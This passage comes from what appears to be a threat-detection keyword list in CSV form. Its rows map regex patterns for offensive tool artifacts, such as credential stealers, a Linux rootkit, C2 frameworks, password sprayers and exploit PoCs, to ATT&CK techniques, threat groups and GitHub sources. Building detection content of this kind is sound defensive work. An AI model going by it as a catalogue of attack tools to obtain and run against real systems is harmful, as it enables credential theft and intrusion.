"*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","46831"
"*hackbrowersdata.cna*",".{0,1000}hackbrowersdata\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","46832"
"*hack-browser-data.exe*",".{0,1000}hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","46833"
"*hack-browser-data/*",".{0,1000}hack\-browser\-data\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","46834"
"*hackbuildrepeat/SharpView*",".{0,1000}hackbuildrepeat\/SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","46835"
"*Hackcraft-Labs/ScheduleRunner*",".{0,1000}Hackcraft\-Labs\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","46836"
"*Hackcraft-Labs/SharpShares*",".{0,1000}Hackcraft\-Labs\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","46837"
"*Hacked by Skenda Unikkatil*",".{0,1000}Hacked\sby\sSkenda\sUnikkatil.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","46838"
"*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","46839"
"*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","46840"
"*HACKER*FUCKER*Xeroxxx*",".{0,1000}HACKER.{0,1000}FUCKER.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46841"
"*hackerhouse-opensource/OffensiveLua*",".{0,1000}hackerhouse\-opensource\/OffensiveLua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","46842"
"*hackerhouse-opensource/SignToolEx*",".{0,1000}hackerhouse\-opensource\/SignToolEx.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","46843"
"*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46844"
"*hackerschoice/gsocket-relay*",".{0,1000}hackerschoice\/gsocket\-relay.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46845"
"*hackerschoice/hackshell*",".{0,1000}hackerschoice\/hackshell.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","46846"
"*hackertarget-get-rootdomains *",".{0,1000}hackertarget\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46847"
"*hackingtool.py*",".{0,1000}hackingtool\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","46849"
"*Hackndo/conpass*",".{0,1000}Hackndo\/conpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","46850"
"*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46851"
"*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","46852"
"*hackndo@gmail.com*",".{0,1000}hackndo\@gmail\.com.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#email","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","46853"
"*Hackplayers/evil-winrm*",".{0,1000}Hackplayers\/evil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46854"
"*hackrf_sweep -f *",".{0,1000}hackrf_sweep\s\-f\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46855"
"*hackshell-main.zip*",".{0,1000}hackshell\-main\.zip.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","46856"
"*hacksysteam/CVE-2023-*",".{0,1000}hacksysteam\/CVE\-2023\-.{0,1000}","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","46857"
"*HackTheWorld*",".{0,1000}HackTheWorld.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","N/A","10","977","169","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z","46858"
"*HackTool.MSIL.KeeFarce*",".{0,1000}HackTool\.MSIL\.KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","46879"
"*HackTool:Win32/KeeFarce*",".{0,1000}HackTool\:Win32\/KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","46952"
"*HackTool:Win32/PWDump*",".{0,1000}HackTool\:Win32\/PWDump.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","46958"
"*HackTool:Win32/PWDump*",".{0,1000}HackTool\:Win32\/PWDump.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","46959"
"*hacktools-*.xpi*",".{0,1000}hacktools\-.{0,1000}\.xpi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46968"
"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*",".{0,1000}hack\-tools\/cmbndhnoonmghfofefkcccljbkdpamhi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46969"
"*Hack-Tools-master*",".{0,1000}Hack\-Tools\-master.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46970"
"*hades_directsys.exe*",".{0,1000}hades_directsys\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","7","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","46971"
"*HadesLdr-main*",".{0,1000}HadesLdr\-main.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","46972"
"*Hagrid29/DumpAADSyncCreds*",".{0,1000}Hagrid29\/DumpAADSyncCreds.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","46973"
"*Hak5 Cloud C*",".{0,1000}Hak5\sCloud\sC\?.{0,1000}","offensive_tool_keyword","Hak5 Cloud C2","Hak5 Cloud C2 web title","T1071.001","TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46974"
"*hak5/omg-payloads*",".{0,1000}hak5\/omg\-payloads.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","46975"
"*hakaioffsec/CVE-2024-21338*",".{0,1000}hakaioffsec\/CVE\-2024\-21338.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","46976"
"*haKCers.txt*",".{0,1000}haKCers\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46977"
"*hakivvi/proxylogon*",".{0,1000}hakivvi\/proxylogon.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","1","N/A","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","46978"
"*hakluke/hakrawler*",".{0,1000}hakluke\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46979"
"*hakrawler -*",".{0,1000}hakrawler\s\-.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46980"
"*hakrawler.go*",".{0,1000}hakrawler\.go.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46981"
"*hakrawler@latest*",".{0,1000}hakrawler\@latest.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46982"
"*hakrawler-ip-range*",".{0,1000}hakrawler\-ip\-range.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46983"
"*hakrawler-master*",".{0,1000}hakrawler\-master.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46984"
"*haktrails subdomains*",".{0,1000}haktrails\ssubdomains.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46985"
"*Hakumarachi/Bropper*",".{0,1000}Hakumarachi\/Bropper.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","8","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","46986"
"*halielang@protonmail.com*",".{0,1000}halielang\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46987"
"*Halo's Gate and Tartarus' Gate Patch for `syscall` instruction rather than `SSN`*",".{0,1000}Halo\'s\sGate\sand\sTartarus\'\sGate\sPatch\sfor\s\`syscall\`\sinstruction\srather\sthan\s\`SSN\`.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","46988"
"*handelsregister-get-company-names *",".{0,1000}handelsregister\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46989"
"*handle_nessus_file*",".{0,1000}handle_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec.  CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46990"
"*handlekatz.py*",".{0,1000}handlekatz\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46991"
"*handlekatz.x64.*",".{0,1000}handlekatz\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba 